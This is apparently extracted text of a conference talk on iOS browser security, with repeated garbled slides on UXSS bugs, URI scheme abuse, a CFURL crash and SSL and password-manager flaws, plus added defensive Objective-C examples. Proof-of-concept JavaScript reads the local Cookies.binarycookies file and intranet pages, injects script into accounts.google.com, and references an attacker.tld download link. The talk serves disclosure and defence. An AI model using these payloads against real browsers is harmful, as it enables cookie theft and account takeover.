ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 40: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/40.jpg)
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
  w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)

UXSS: Universal Cross-Site Scripting

Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] (malformed string) —> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) —> NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename *.html

JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>
<script>
x = new XMLHttpRequest(); x.open('GET', 'https://yourintranet', false); x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
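The defensive side of the slides above (cross-tab document.write handled by a WKUIDelegate, a baseURL that is never nil, and JavaScript disabled for downloaded HTML) as an added Objective-C example; this is not code from the talk or from any browser it discusses. BrowserTabController, its tab list and container view, addTabWithConfiguration:, openDownloadedHTMLAtPath:error:, opaqueBaseURL and baseURLForUntrustedString: are assumed names, and the WKNavigationDelegate scheme policy at the end goes one step beyond the slides by also covering iframe navigations to custom schemes.

```objective-c
// Added example, not code from the talk: a minimal WKWebView tab controller that
// keeps popups, cross-tab document.write and downloaded HTML inside WebKit's SOP.
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

@interface BrowserTabController : NSObject <WKUIDelegate, WKNavigationDelegate>
@property (nonatomic, strong) NSMutableArray<WKWebView *> *tabs; // hypothetical tab list
@property (nonatomic, strong) UIView *containerView;             // hypothetical host view
@end

@implementation BrowserTabController

- (instancetype)initWithContainerView:(UIView *)view {
    if ((self = [super init])) { _tabs = [NSMutableArray array]; _containerView = view; }
    return self;
}

// Base URL for HTML loaded from a string. Never nil: on UIWebView a nil baseURL
// put the document into the applewebdata:// origin, which has no same-origin
// policy at all. about:blank is an opaque origin with no web or file access.
+ (NSURL *)opaqueBaseURL {
    return [NSURL URLWithString:@"about:blank"];
}

// Base URL derived from untrusted input (e.g. where an HTML string was fetched
// from). A string NSURL cannot parse yields nil, and nil must never reach
// loadHTMLString:baseURL:, so nil and every non-http(s) scheme become about:blank.
+ (NSURL *)baseURLForUntrustedString:(NSString *)candidate {
    NSURL *url = [NSURL URLWithString:candidate ?: @""];
    NSString *scheme = url.scheme.lowercaseString;
    if (url && ([scheme isEqualToString:@"http"] || [scheme isEqualToString:@"https"])) {
        return url;
    }
    return [self opaqueBaseURL];
}

- (WKWebView *)addTabWithConfiguration:(WKWebViewConfiguration *)configuration {
    WKWebView *tab = [[WKWebView alloc] initWithFrame:self.containerView.bounds
                                        configuration:configuration];
    tab.UIDelegate = self;
    tab.navigationDelegate = self;
    [self.tabs addObject:tab];
    [self.containerView addSubview:tab];
    return tab;
}

// Safe cross-tab document.write (iOS 8): window.open() from page JavaScript ends
// up here. Returning a WKWebView built from the *supplied* configuration keeps the
// opener/child relationship inside WebKit, so a later w.document.write(...) is
// checked by WebKit's same-origin policy rather than by a JS-to-native bridge
// that has to re-implement it (the Mercury and Yandex bugs in the talk).
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    // targetFrame is nil only for a genuinely new window; anything else is not a popup.
    if (navigationAction.targetFrame != nil) { return nil; }
    return [self addTabWithConfiguration:configuration];
}

// Opening a downloaded HTML file safely: load it as a string with an about:blank
// base URL (never from file://) and with JavaScript disabled for this tab.
- (WKWebView *)openDownloadedHTMLAtPath:(NSString *)path error:(NSError **)error {
    NSString *html = [NSString stringWithContentsOfFile:path encoding:NSUTF8StringEncoding error:error];
    if (html == nil) { return nil; }
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    WKWebView *viewer = [self addTabWithConfiguration:config];
    [viewer loadHTMLString:html baseURL:[BrowserTabController opaqueBaseURL]];
    return viewer;
}

// Scheme policy for every navigation, including <iframe src="custom-scheme://...">,
// which the talk notes slips past popup blockers. Web and about: URLs load; file://
// and applewebdata:// are never loaded; a registered (external) scheme is handed to
// the system only for a link the user activated in the main frame.
- (void)webView:(WKWebView *)webView
decidePolicyForNavigationAction:(WKNavigationAction *)navigationAction
                decisionHandler:(void (^)(WKNavigationActionPolicy))decisionHandler {
    NSURL *url = navigationAction.request.URL;
    NSString *scheme = url.scheme.lowercaseString;
    if ([scheme isEqualToString:@"http"] || [scheme isEqualToString:@"https"] ||
        [scheme isEqualToString:@"about"]) {
        decisionHandler(WKNavigationActionPolicyAllow);
        return;
    }
    BOOL userClickInMainFrame = navigationAction.navigationType == WKNavigationTypeLinkActivated &&
                                navigationAction.targetFrame.isMainFrame;
    if (userClickInMainFrame && ![scheme isEqualToString:@"file"] &&
        ![scheme isEqualToString:@"applewebdata"] && [[UIApplication sharedApplication] canOpenURL:url]) {
        [[UIApplication sharedApplication] openURL:url];
    }
    decisionHandler(WKNavigationActionPolicyCancel);
}

@end
```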

Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com">, etc. bypass all popup blockers anyway…

URI schemes: Native (WebKit), Application (bolted-on), Bridge (internal), Registered (external)
• scheme://download?https://secure.tld/victim/data, scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c, etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
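The NULL check the CFURL slide calls for, as an added Objective-C example that is not the talk's code: PathOfURLString is a hypothetical helper, and the sample inputs are constructed from the percent-encoding cases listed above plus one well-formed URL.

```objective-c
// Added example, not code from the talk: guard CoreFoundation URL calls against
// the NULL that CFURLCreateWithString returns for a malformed string.
#import <Foundation/Foundation.h>
#import <CoreFoundation/CoreFoundation.h>

// Returns the path of `candidate`, or nil when CFURL refuses to parse it.
// Without the NULL check, CFURLCopyPath(NULL) dereferences a null pointer,
// which is the EXC_BAD_ACCESS in CFURLCopyPath() shown for Opera Coast.
static NSString *PathOfURLString(NSString *candidate) {
    if (candidate == nil) {
        return nil;   // a NULL CFStringRef would fault inside CFURLCreateWithString too
    }
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)candidate, NULL);
    if (url == NULL) {
        return nil;   // malformed percent-encoding such as "http://%5c" lands here
    }
    CFStringRef path = CFURLCopyPath(url);   // safe: url is non-NULL
    NSString *result = path ? (NSString *)CFBridgingRelease(path) : @"";
    CFRelease(url);
    return result;
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        // Constructed inputs: the talk's percent-encoding cases plus a valid URL.
        NSArray<NSString *> *samples = @[@"http://%", @"http://%5", @"http://%5c",
                                         @"http://example.com/a/b"];
        for (NSString *s in samples) {
            NSString *p = PathOfURLString(s);
            NSLog(@"%@ -> %@", s, p ?: @"(rejected: CFURL returned NULL)");
        }
    }
    return 0;
}
```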
Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">

SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with privileges of the top frame —> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
Questions?
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter: runicpl, h0wlu
Thank you
![Page 41: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/41.jpg)
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 42: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/42.jpg)
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
